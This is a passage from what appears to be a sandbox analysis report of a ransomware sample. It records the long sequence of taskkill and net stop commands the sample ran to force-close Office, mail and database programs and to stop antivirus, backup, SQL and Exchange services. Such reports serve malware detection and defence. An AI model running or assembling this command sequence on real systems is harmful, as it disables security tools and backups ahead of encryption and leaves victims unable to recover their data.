"C:\Windows\System32\taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2452

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2488

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2576

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2792

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2852

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2912

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2160

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2836

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2860

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:924

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2068

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3012

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2528

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3084

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3160

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3196

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3248

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3288

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y
2⤵
PID:3492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
3⤵
PID:3684

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y
2⤵
PID:3556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Enterprise Client Service" /y
3⤵
PID:3696

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Agent" /y
2⤵
PID:3592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Agent" /y
3⤵
PID:3716

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y
2⤵
PID:3628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
3⤵
PID:3772

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y
2⤵
PID:3656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Clean Service" /y
3⤵
PID:3796

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y
2⤵
PID:3728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
3⤵
PID:3864

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y
2⤵
PID:3760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
3⤵
PID:3880

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Health Service" /y
2⤵
PID:3820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Health Service" /y
3⤵
PID:3964

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y
2⤵
PID:3892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Client" /y
3⤵
PID:4048

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Message Router" /y
2⤵
PID:3936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Message Router" /y
3⤵
PID:4064

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y
2⤵
PID:3976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
3⤵
PID:4028

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y
2⤵
PID:3848

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y
2⤵
PID:4036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
3⤵
PID:3316

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y
2⤵
PID:4072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
3⤵
PID:1288

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y
2⤵
PID:1256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
3⤵
PID:3500

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y
2⤵
PID:1628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
3⤵
PID:3640

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y
2⤵
PID:1240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec System Recovery" /y
3⤵
PID:3668

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop AcronisAgent /y
2⤵
PID:3564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
3⤵
PID:3872

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y
2⤵
PID:3324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
3⤵
PID:3720

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop Antivirus /y
2⤵
PID:3688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
3⤵
PID:3628

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop AcrSch2Svc /y
2⤵
PID:3680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
3⤵
PID:3776

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ARSM /y
2⤵
PID:3560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ARSM /y
3⤵
PID:3708

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:3748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
3⤵
PID:3812

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:3828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
3⤵
PID:3948

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y
2⤵
PID:3660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
3⤵
PID:3848

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecManagementService /y
2⤵
PID:3744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
3⤵
PID:4060

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecJobEngine /y
2⤵
PID:3900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
3⤵
PID:3824

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecRPCService /y
2⤵
PID:3984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
3⤵
PID:3940

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y
2⤵
PID:3764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3⤵
PID:3896

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop bedbg /y
2⤵
PID:3964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop bedbg /y
3⤵
PID:1440

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop DCAgent /y
2⤵
PID:4004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
3⤵
PID:3540

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EPSecurityService /y
2⤵
PID:4032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
3⤵
PID:4056

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EPUpdateService /y
2⤵
PID:4080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
3⤵
PID:3260

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EraserSvc11710 /y
2⤵
PID:3168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
3⤵
PID:3576

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EsgShKernel /y
2⤵
PID:3180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
3⤵
PID:656

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop FA_Scheduler /y
2⤵
PID:3116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
3⤵
PID:3692

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop IISAdmin /y
2⤵
PID:1628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
3⤵
PID:3800

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop IMAP4Svc /y
2⤵
PID:3232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IMAP4Svc /y
3⤵
PID:3560

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop macmnsvc /y
2⤵
PID:3792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
3⤵
PID:3772

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop masvc /y
2⤵
PID:3680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop masvc /y
3⤵
PID:3816

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MBAMService /y
2⤵
PID:3756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
3⤵
PID:3736

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MBEndpointAgent /y
2⤵
PID:3608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
3⤵
PID:3848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
4⤵
PID:3932

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McAfeeEngineService /y
2⤵
PID:3884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
3⤵
PID:3916

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McAfeeFramework /y
2⤵
PID:3780

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
3⤵
PID:3972

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y
2⤵
PID:3852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
3⤵
PID:3760

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McShield /y
2⤵
PID:3904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McShield /y
3⤵
PID:3988

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mfemms /y
2⤵
PID:3896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
3⤵
PID:3364

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mfevtp /y
2⤵
PID:3984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
3⤵
PID:3280

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McTaskManager /y
2⤵
PID:3784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
3⤵
PID:3136

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MMS /y
2⤵
PID:3912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
3⤵
PID:4004

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mozyprobackup /y
2⤵
PID:1596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
3⤵
PID:1240

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MsDtsServer /y
2⤵
PID:608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
3⤵
PID:3620

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MsDtsServer110 /y
2⤵
PID:4080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
3⤵
PID:3624

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MsDtsServer100 /y
2⤵
PID:3540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
3⤵
PID:3188

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeIS /y
2⤵
PID:4040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
3⤵
PID:3924

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeES /y
2⤵
PID:1256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
3⤵
PID:668

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeMGMT /y
2⤵
PID:3704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
3⤵
PID:3816

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeMTA /y
2⤵
PID:3496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
3⤵
PID:3736

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeSA /y
2⤵
PID:3324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
3⤵
PID:4000

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeSRS /y
2⤵
PID:3716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
3⤵
PID:4060

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y
2⤵
PID:3544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
3⤵
PID:3728

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y
2⤵
PID:3756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
3⤵
PID:4044

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y
2⤵
PID:3884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
3⤵
PID:3036

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y
2⤵
PID:3940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
3⤵
PID:3936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
3⤵
PID:4092

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y
2⤵
PID:3920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
3⤵
PID:4008

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y
2⤵
PID:4064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
3⤵
PID:3500

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$TPS /y
2⤵
PID:3848

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y
2⤵
PID:3964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
3⤵
PID:3976

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y
2⤵
PID:4076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
3⤵
PID:3744

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y
2⤵
PID:3764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
3⤵
PID:3616

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y
2⤵
PID:3204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
3⤵
PID:3316

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y
2⤵
PID:3620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
3⤵
PID:3224

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y
2⤵
PID:4032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
3⤵
PID:3708

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$TPS /y
2⤵
PID:4080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
3⤵
PID:3792

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y
2⤵
PID:668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
3⤵
PID:3836

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:3752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:3660

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y
2⤵
PID:3640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher /y
3⤵
PID:3644

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y
2⤵
PID:3600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
3⤵
PID:3880

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
2⤵
PID:3584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3⤵
PID:3596

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
2⤵
PID:3696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
3⤵
PID:3852

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
2⤵
PID:3916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
3⤵
PID:3828

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y
2⤵
PID:3716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
3⤵
PID:3996

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
2⤵
PID:3848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
3⤵
PID:3676

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y
2⤵
PID:1288

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
3⤵
PID:3976

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y
2⤵
PID:3280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
3⤵
PID:4052

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y
2⤵
PID:3904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
3⤵
PID:3540

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLSERVER /y
2⤵
PID:3756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
3⤵
PID:3764

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MySQL57 /y
2⤵
PID:3844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
3⤵
PID:3620

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ntrtscan /y
2⤵
PID:3260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
3⤵
PID:3736

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MySQL80 /y
2⤵
PID:3784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
3⤵
PID:3556

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y
2⤵
PID:3940

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop OracleClientCache80 /y
2⤵
PID:3636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
3⤵
PID:3692

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop PDVFSService /y
2⤵
PID:3624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
3⤵
PID:3864

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop POP3Svc /y
2⤵
PID:4088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
3⤵
PID:3880

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer /y
2⤵
PID:4032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
3⤵
PID:3608

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:3560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
3⤵
PID:3584

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y
2⤵
PID:3660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
3⤵
PID:1596

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer$TPS /y
2⤵
PID:3564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
3⤵
PID:656

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y
2⤵
PID:3596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
3⤵
PID:3136

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop RESvc /y
2⤵
PID:3936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESvc /y
3⤵
PID:4056

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop sacsvr /y
2⤵
PID:3632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
3⤵
PID:3868

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SamSs /y
2⤵
PID:3496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
3⤵
PID:3964

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SAVAdminService /y
2⤵
PID:4000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
3⤵
PID:4048

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SAVService /y
2⤵
PID:3808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVService /y
3⤵
PID:3832

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SDRSVC /y
2⤵
PID:4020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
3⤵
PID:608

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SepMasterService /y
2⤵
PID:3932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
3⤵
PID:3784

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ShMonitor /y
2⤵
PID:3760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
3⤵
PID:3704

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop Smcinst /y
2⤵
PID:1440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
3⤵
PID:3624

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SmcService /y
2⤵
PID:3756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SmcService /y
3⤵
PID:3816

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SMTPSvc /y
2⤵
PID:3776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
3⤵
PID:1256

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SNAC /y
2⤵
PID:3844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SNAC /y
3⤵
PID:3636

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SntpService /y
2⤵
PID:3792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
3⤵
PID:3772

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop sophossps /y
2⤵
PID:3116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophossps /y
3⤵
PID:668

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y
2⤵
PID:3628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
3⤵
PID:3968

C:\Windows\System32\net.exe
